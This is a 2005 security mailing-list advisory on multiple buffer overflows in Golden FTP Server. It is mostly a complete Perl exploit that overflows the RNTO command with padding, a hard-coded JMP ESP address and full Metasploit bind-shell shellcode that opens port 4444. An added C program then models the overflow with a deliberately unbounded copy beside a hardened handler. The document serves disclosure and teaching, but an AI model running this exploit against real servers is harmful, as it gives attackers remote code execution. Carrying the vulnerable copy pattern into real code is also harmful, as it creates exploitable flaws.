[NT] Multiple Buffer Overflows in Golden FTP Server

From: SecuriTeam (support_at_securiteam.com)
Date: 01/25/05

    To: list@securiteam.com
    Date: 25 Jan 2005 18:47:22 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Multiple Buffer Overflows in Golden FTP Server
    ------------------------------------------------------------------------

    SUMMARY

    Golden FTP Server (http://www.goldenftpserver.com/) is an extremely
    easy-to-use personal FTP server for Windows that can be run by anyone with
    the most basic computer skills.

    Golden FTP Server contains multiple buffer overflows that allow an attacker
    to run arbitrary machine code on the target machine.

    DETAILS

    Vulnerable Systems:
     * Golden FTP Server PRO version 2.02b and prior

    Immune Systems:
     * Golden FTP Server PRO version 2.05b or newer

    Exploit Code:
    The following exploit uses the buffer overflow in the RNTO command to open
    a bind shell on port 4444. The RNTO argument consists of 260 bytes of
    padding up to the saved return address, a JMP ESP address for Windows XP
    SP2, a short NOP sled and a Metasploit win32_bind payload.

    #!/usr/bin/perl -w
    # Barabas - www.whitehat.co.il -
    # cheers to muts and all peeps at WH.
    # XPSP2 goldenftpserver sploit - bind 4444
    #
    # Layout of the RNTO argument: 260 bytes of padding reach the saved
    # return address, which is overwritten with the address of a JMP ESP;
    # after the RET, ESP points at the NOP sled followed by the bind shell.

    use strict;
    use Net::FTP;

    # Target host: first command-line argument, default localhost.
    my $host = @ARGV ? $ARGV[0] : "127.0.0.1";

    my $payload = "\x41" x 260;                # padding up to the return address
    $payload .= "\x65\x82\xa5\x7c";            # JMP ESP, 0x7ca58265 (XP SP2)
    $payload .= "\x90" x 32;                   # NOP sled; not really necessary
    # win32_bind - EXITFUNC=seh LPORT=4444 Size=321 Encoder=None
    # http://metasploit.com
    $payload .=
    "\xfc\x6a\xeb\x4f\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
    "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\xe3".
    "\x30\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1".
    "\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe3\x8b\x5f\x24\x01".
    "\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24".
    "\x1c\x61\xc3\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x1c\xad".
    "\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x31\xdb\x66\x53".
    "\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc".
    "\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff".
    "\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53".
    "\x43\x53\xff\xd0\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a".
    "\x70\xc7\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9".
    "\x57\xff\xd6\x53\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50".
    "\x54\x54\x55\xff\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff".
    "\xd0\x66\x6a\x64\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89".
    "\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93".
    "\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6".
    "\x5b\x57\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad".
    "\xd9\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83".
    "\xc4\x64\xff\xd6\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff".
    "\xd0";

    # Connect, log in anonymously and send the overlong RNTO argument.
    my $ftp = Net::FTP->new($host, Debug => 1)
        or die "Cannot connect to $host: $@";
    $ftp->login("ftp", "ftp")
        or die "Login failed: ", $ftp->message;
    $ftp->quot("RNTO", $payload);              # triggers the overflow
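
    The following C program is an added example, not Golden FTP Server's code
    and not part of the advisory. It models the bug class the advisory
    describes (an RNTO argument copied into a fixed-size stack buffer) beside a
    hardened handler, and rebuilds the payload layout the Perl exploit above
    sends so that the reader can see which bytes land on the saved frame
    pointer and return address. The 256-byte buffer, the frame layout and the
    4-byte shellcode stand-in are assumptions chosen to match the exploit's
    260 bytes of padding; the real server's internals are not on the page.

```c
/*
 * Added example, not Golden FTP's code. Models the RNTO overflow class from
 * the advisory and the layout of the Perl exploit's payload.
 *
 * ASSUMPTIONS: a 256-byte local buffer sits directly below the saved EBP and
 * return address (matches the exploit's 260 bytes of padding). Little-endian
 * host. SC_STUB is a constructed placeholder, not the Metasploit bind shell.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RNTO_BUF 256            /* assumed size of the local buffer       */
#define PAD_LEN  260            /* padding the exploit sends (buf + EBP)  */
#define NOP_LEN  32             /* NOP sled length in the exploit         */
#define JMP_ESP  0x7ca58265u    /* return address used by the exploit     */

/* Image of the victim's stack frame, kept in a struct so the overwrite can
 * be inspected without corrupting this program's own stack. */
struct frame {
    char     name[RNTO_BUF];    /* destination of the RNTO argument copy   */
    uint32_t saved_ebp;         /* offset 256: filled with 'A'             */
    uint32_t ret_addr;          /* offset 260: JMP ESP lands here          */
    uint8_t  above[512];        /* ESP points here after RET: sled + code  */
};

static const uint8_t SC_STUB[] = { 0xcc, 0xcc, 0xcc, 0xcc };   /* placeholder */

/* Vulnerable pattern: copy the argument with no regard for the buffer size.
 * The copy targets the whole frame image to keep the model well-defined. */
static void rnto_vulnerable(struct frame *f, const uint8_t *arg, size_t len)
{
    if (len > sizeof *f) len = sizeof *f;        /* keep the model in bounds */
    memcpy((uint8_t *)f, arg, len);              /* runs past name[] */
}

/* Length bounded by max, so an unterminated argument is never over-read. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0') n++;
    return n;
}

/* Hardened pattern: measure first, reject what does not fit (501 reply). */
static int rnto_hardened(char *dst, size_t dstsz, const char *arg)
{
    size_t n = bounded_len(arg, dstsz);
    if (n == dstsz) return -1;                   /* 501: argument too long */
    memcpy(dst, arg, n + 1);
    return 0;
}

/* Same layout as the Perl: PAD_LEN x 'A', JMP ESP (little-endian), NOP sled,
 * shellcode. Returns the total length, or 0 if it does not fit in out[]. */
static size_t build_payload(uint8_t *out, size_t cap, uint32_t jmp_esp,
                            const uint8_t *sc, size_t sclen)
{
    size_t need = PAD_LEN + 4 + NOP_LEN + sclen;
    if (cap < need) return 0;
    memset(out, 'A', PAD_LEN);
    for (int i = 0; i < 4; i++) out[PAD_LEN + i] = (uint8_t)(jmp_esp >> (8 * i));
    memset(out + PAD_LEN + 4, 0x90, NOP_LEN);
    memcpy(out + PAD_LEN + 4 + NOP_LEN, sc, sclen);
    return need;
}

/* Builds the payload and feeds it to the vulnerable handler. */
struct frame run_exploit_model(uint32_t jmp_esp)
{
    struct frame f;
    uint8_t buf[sizeof f];
    memset(&f, 0, sizeof f);
    size_t n = build_payload(buf, sizeof buf, jmp_esp, SC_STUB, sizeof SC_STUB);
    rnto_vulnerable(&f, buf, n);
    return f;
}

uint32_t model_ret_addr(uint32_t jmp_esp)  { return run_exploit_model(jmp_esp).ret_addr; }
uint32_t model_saved_ebp(uint32_t jmp_esp) { return run_exploit_model(jmp_esp).saved_ebp; }
int model_byte_above(uint32_t jmp_esp, size_t idx)
{
    struct frame f = run_exploit_model(jmp_esp);
    return idx < sizeof f.above ? f.above[idx] : -1;
}

/* Same payload, NUL-terminated, against the hardened handler: -1 = rejected. */
int hardened_accepts_exploit(uint32_t jmp_esp)
{
    uint8_t buf[sizeof(struct frame) + 1];
    char dst[RNTO_BUF];
    size_t n = build_payload(buf, sizeof buf - 1, jmp_esp, SC_STUB, sizeof SC_STUB);
    buf[n] = '\0';
    return rnto_hardened(dst, sizeof dst, (const char *)buf);
}

int hardened_accepts_name(const char *name)
{
    char dst[RNTO_BUF];
    return rnto_hardened(dst, sizeof dst, name);
}

int main(void)
{
    printf("saved EBP 0x%08x, return address 0x%08x, byte after RET 0x%02x\n",
           model_saved_ebp(JMP_ESP), model_ret_addr(JMP_ESP), model_byte_above(JMP_ESP, 0));
    printf("hardened: exploit -> %d, \"renamed.txt\" -> %d\n",
           hardened_accepts_exploit(JMP_ESP), hardened_accepts_name("renamed.txt"));
    return 0;
}
```

    The model shows why the exploit pads with exactly 260 bytes: 256 fill the
    assumed buffer, the next 4 overwrite the saved frame pointer, and bytes
    260..263 become the return address. The hardened handler never reads more
    than it can store and refuses the argument before any copy takes place.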

    ADDITIONAL INFORMATION

    The information has been provided by barabas mutsonline
    (barbsie@gmail.com).

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

